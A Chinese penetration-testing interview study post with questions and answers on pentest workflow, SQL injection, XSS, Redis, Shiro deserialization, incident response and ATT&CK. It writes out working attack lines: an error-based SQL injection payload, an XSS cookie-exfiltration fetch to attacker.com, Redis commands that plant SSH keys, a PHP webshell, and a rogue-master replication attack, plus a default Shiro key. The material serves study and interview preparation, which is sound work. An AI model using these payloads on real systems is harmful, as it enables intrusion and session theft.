2025年渗透测试面试题总结-2025年HW(护网面试) 24(题目+回答)

安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

 2025年HW(护网面试) 24

1. 自我介绍

2. 渗透测试流程 & 内网经验

3. SQL注入(报错型)

4. XSS利用(反射型/DOM型)

5. Redis未授权访问利用

6. 应急响应流程

7. 手动检测Shiro反序列化

8. 漏洞研究与开发能力

9. Hook技术理解

10. ATT&CK框架实战

 2025年HW(护网面试) 24

1、自我介绍
2、渗透测试流程,有没有打过内网
3、SQL注入,报错
4、XSS,反射/DOM型,怎么利用
5、Redis的利用
6、应急响应能力怎么样,处置流程思路
7、无态势感知,安全设备,怎样手动发现shiro反序列化漏洞进来都攻击
8、平时有分析研究漏洞吗,编写exp,熟悉什么开发语言
9、关于hook了解
10、ATT&CK框架了解吗、到什么程度,是否有过应用

1. 自我介绍


2. 渗透测试流程 & 内网经验

标准化流程(PTES框架)

  1. 情报收集:WHOIS/子域名/端口扫描(Nmap/Masscan)
  2. 威胁建模:识别高价值目标(域控、数据库、SVN)
  3. 漏洞分析:自动化扫描(Nessus/AWVS)+ 手工验证(Burp Suite)
  4. 渗透利用:突破边界(Web漏洞/弱口令)→ 内网横向移动
  5. 后渗透阶段:权限维持(Golden Ticket/影子凭证)、数据窃取
  6. 报告输出:风险评级+修复建议

内网渗透关键动作

  • 横向移动
    • 协议利用:SMB爆破(Responder)、WinRM执行
    • 凭据窃取:Mimikatz抓取内存密码 → 密码喷洒攻击
  • 权限提升
    • Windows:MS14-068(Kerberos漏洞)、JuicyPotato提权
    • Linux:SUID滥用(find/bash)、DirtyPipe(CVE-2022-0847)
  • 域控攻陷
    • DCSync攻击获取krbtgt哈希 → 伪造域管令牌

3. SQL注入(报错型)

原理:触发数据库错误回显敏感信息
经典Payload

sql' AND (SELECT 1 FROM (SELECT COUNT(*),CONCAT((SELECT version()),0x3a,FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)--

利用场景

  • MySQL:floor(rand()*2) + group by 触发主键冲突
  • MSSQL:convert(int,@@version) 强制类型转换
  • Oracle:ctxsys.drithsx.sn() 调用无效函数

防御绕过

  • 混淆:Hex编码/注释符插入(/**/
  • WAF绕过:分块传输(Chunked Encoding)+ 异常HTTP方法

4. XSS利用(反射型/DOM型)

类型触发机制利用场景
反射型恶意参数在HTTP响应中原样输出钓鱼邮件嵌入短链接劫持会话
DOM型前端JS解析URL参数动态修改DOM绕过CSP限制(如eval(location.hash)

高级利用技术

  • 会话劫持
    javascriptfetch('https://attacker.com/?cookie='+document.cookie) 
  • DOM Clobbering
    覆盖全局变量 → 绕过过滤逻辑(如 <a id=config href="恶意数据">
  • CORS绕过
    结合XSS + 缺乏Origin验证 → 读取跨域敏感接口

5. Redis未授权访问利用

攻击路径

  1. 写入SSH密钥
    bashredis-cli -h 目标IP flushall echo -e "\n\nssh-rsa AAAAB3NzaC...公钥内容" | redis-cli -h 目标IP -x set crackit redis-cli -h 目标IP config set dir /root/.ssh/ redis-cli -h 目标IP config set dbfilename authorized_keys redis-cli -h 目标IP save 
  2. Webshell写入
    bashconfig set dir /var/www/html/ config set dbfilename shell.php set payload "<?php system($_GET['c']);?>" save 
  3. 主从复制RCE(4.x-5.0.5):
    bashredis-cli -h 目标IP SLAVEOF 攻击者IP 6379 # 攻击端启动恶意Redis实例,加载module.so 执行命令 

6. 应急响应流程

PDCERF模型实战应用

  1. 准备阶段
    • 工具包:LogParser/Volatility/Autopsy + 硬盘镜像设备
  2. 检测阶段
    • 异常指标:CPU暴增(挖矿)/ 外连C2(netstat -an)
    • 日志分析:
      • Windows:Event Viewer → 事件ID 4624/4625(登录)
      • Linux:/var/log/auth.log (SSH爆破)
  3. 抑制阶段
    • 隔离主机:防火墙阻断出站(iptables -A OUTPUT -d C2_IP -j DROP
    • 关停服务:停用受影响应用(如Apache)
  4. 根因分析
    • 内存取证:使用Volatility查找恶意进程
    • 文件排查:find / -mtime -1(24小时内修改文件)
  5. 恢复阶段
    • 重置密码:所有关联账户
    • 重装系统:彻底清除后门
  6. 总结报告
    • 攻击时间线重建 + IOCs(HASH/IP/域名)提交威胁情报

7. 手动检测Shiro反序列化

无设备时的关键线索

  1. Cookie特征
    • 查找rememberMe=deleteMe(Shiro默认Cookie)
    • 观察长度变化:有效Payload > 128字节
  2. 响应异常
    • 无效密钥时返回Set-Cookie: rememberMe=deleteMe
    • 有效密钥但恶意Payload → 无错误但触发RCE
  3. 密钥爆破
    • 使用已知密钥字典(如kPH+bIxk5D2deZiIxcaaaA==)
    • 配合Ysoserial生成CommonsBeanutils1的Payload
  4. 流量特征
    • HTTP请求中Cookie长度显著增加(Base64编码的序列化数据)

8. 漏洞研究与开发能力

  • 研究方向
    • 重点:Java反序列化(Fastjson/Jackson)、RCE逻辑漏洞(Confluence/Jenkins)
    • 漏洞复现:搭建Vulhub环境验证CVE
  • EXP开发
    • 语言:Python(POC脚本)、Java(JNDI注入工具)、C(Shellcode编写)
    • 案例:编写Shiro Padding Oracle漏洞利用工具(CBC模式密钥爆破)
  • 工具链
    • 调试:IDEA + JNDI-Injection-Exploit
    • 抓包:Burp Suite插件开发(自定义扫描逻辑)

9. Hook技术理解

应用场景

  • 攻击方
    • API Hook:劫持系统函数(如Windows API WriteFile()
    • 浏览器Hook:Chrome扩展注入JS监听表单提交
  • 防御方
    • 用户态Hook:Detours库监控进程行为
    • 内核态Hook:Sysmon过滤恶意驱动加载
      工具示例
  • Frida:动态注入JS脚本拦截Android函数
    javascriptInterceptor.attach(Module.getExportByName('libc.so', 'open'), { onEnter: function(args) { console.log(" 打开文件: " + Memory.readCString(args[0])); } });

10. ATT&CK框架实战

掌握程度

  • 战术层映射
    • 初始访问:T1190(利用公开应用漏洞)
    • 持久化:T1053.005(Systemd定时任务)
    • 防御绕过:T1620(反射DLL注入)
  • 技术层应用
    • 红队:基于TTPs设计攻击路径(如T1078 → 利用合法账户)
    • 蓝队:
      • 创建检测规则:Sigma规则识别PsExec使用(T1569.002)
      • 威胁狩猎:查询日志中LSASS内存转储行为(T1003.001)
        实战案例
  • 在EDR中部署ATT&CK检测策略:
    • 监控注册表键 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree(T1053.005)
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值